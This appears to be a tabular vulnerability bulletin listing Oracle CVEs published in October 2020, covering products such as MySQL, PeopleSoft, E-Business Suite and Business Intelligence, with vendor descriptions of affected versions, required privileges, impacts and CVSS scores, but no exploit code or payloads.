oracle — business_intelligence	Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14815 MISC
oracle — business_intelligence	Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web Administration). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N).	2020-10-21	5.5	CVE-2020-14766 MISC
oracle — core_rdbms	Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having SYSDBA level account privilege with network access via Oracle Net to compromise Core RDBMS. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Core RDBMS accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).	2020-10-21	5.5	CVE-2020-14742 MISC
oracle — customer_relationship_management_technical_foundation	Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.2.3 – 12.2.10. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle CRM Technical Foundation accessible data as well as unauthorized access to critical data or complete access to all Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N).	2020-10-21	5.5	CVE-2020-14823 MISC
oracle — database	Vulnerability in the RDBMS Security component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows high privileged attacker having Analyze Any privilege with network access via Oracle Net to compromise RDBMS Security. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all RDBMS Security accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).	2020-10-21	6.8	CVE-2020-14901 MISC
oracle — database_filesystem	Vulnerability in the Database Filesystem component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2 and 12.2.0.1. Easily exploitable vulnerability allows high privileged attacker having Resource, Create Table, Create View, Create Procedure, Dbfs_role privilege with network access via Oracle Net to compromise Database Filesystem. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Database Filesystem. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14741 MISC
oracle — database_vault	Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2 and 12.2.0.1. Easily exploitable vulnerability allows high privileged attacker having Create Public Synonym privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Database Vault accessible data as well as unauthorized read access to a subset of Database Vault accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N).	2020-10-21	6.5	CVE-2020-14736 MISC
oracle — e-business_suite_secure_enterprise_search	Vulnerability in the Oracle E-Business Suite Secure Enterprise Search product of Oracle E-Business Suite (component: Search Integration Engine). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite Secure Enterprise Search. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle E-Business Suite Secure Enterprise Search accessible data as well as unauthorized access to critical data or complete access to all Oracle E-Business Suite Secure Enterprise Search accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).	2020-10-21	6.4	CVE-2020-14805 MISC
oracle — flexcube_universal_banking	Vulnerability in the Oracle FLEXCUBE Universal Banking product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 12.3.0 and 14.0.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Universal Banking. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Universal Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).	2020-10-21	6.8	CVE-2020-14887 MISC
oracle — graalvm	Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	5	CVE-2020-14803 CONFIRM MISC
oracle — hospitality_suite	Vulnerability in the Oracle Hospitality Suite8 product of Oracle Hospitality Applications (component: WebConnect). Supported versions that are affected are 8.10.2 and 8.11-8.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Suite8. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Suite8 accessible data as well as unauthorized update, insert or delete access to some of Oracle Hospitality Suite8 accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14807 MISC
oracle — hospitality_suite8	Vulnerability in the Oracle Hospitality Suite8 product of Oracle Hospitality Applications (component: WebConnect). Supported versions that are affected are 8.10.2 and 8.11-8.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Suite8. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Hospitality Suite8 accessible data as well as unauthorized read access to a subset of Oracle Hospitality Suite8 accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N).	2020-10-21	5.8	CVE-2020-14810 MISC
oracle — hyperion_lifecycle_management	Vulnerability in the Hyperion Lifecycle Management product of Oracle Hyperion (component: Shared Services). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Lifecycle Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Lifecycle Management accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N).	2020-10-21	4.9	CVE-2020-14752 MISC
oracle — installed_base	Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: APIs). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).	2020-10-21	4.3	CVE-2020-14822 MISC
oracle — java_virtual_machine	Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Procedure privilege with network access via multiple protocols to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java VM accessible data. CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).	2020-10-21	4.9	CVE-2020-14743 MISC
oracle — marketing	Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14849 MISC
oracle — marketing	Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14835 MISC
oracle — marketing	Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14816 MISC
oracle — marketing	Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14817 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14844 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14846 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4	CVE-2020-14789 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4	CVE-2020-14786 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14830 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4	CVE-2020-14793 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14809 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4	CVE-2020-14794 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4	CVE-2020-14799 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4	CVE-2020-14804 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14848 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4	CVE-2020-14893 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14829 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14821 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	6.5	CVE-2020-14828 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14814 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).	2020-10-21	4	CVE-2020-14827 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14888 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	6.8	CVE-2020-14891 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4	CVE-2020-14790 CONFIRM MISC
oracle — one-to-one_fulfillment	Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). The supported version that is affected is 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14819 MISC
oracle — peoplesoft_enterprise_peopletools	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Grids). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	5.8	CVE-2020-14813 MISC
oracle — peoplesoft_enterprise_peopletools	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	4.3	CVE-2020-14802 MISC
oracle — peoplesoft_enterprise_peopletools	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	4.3	CVE-2020-14801 MISC
oracle — peoplesoft_enterprise_peopletools	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N).	2020-10-21	4.3	CVE-2020-14795 MISC
oracle — peoplesoft_enterprise_peopletools	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	5	CVE-2020-14806 MISC
oracle — peoplesoft_enterprise_peopletools	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	5.8	CVE-2020-14832 MISC
oracle — rest_data_services	Vulnerability in the Oracle REST Data Services product of Oracle REST Data Services (component: General). Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c; Standalone ORDS: prior to 20.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle REST Data Services accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).	2020-10-21	4	CVE-2020-14744 MISC
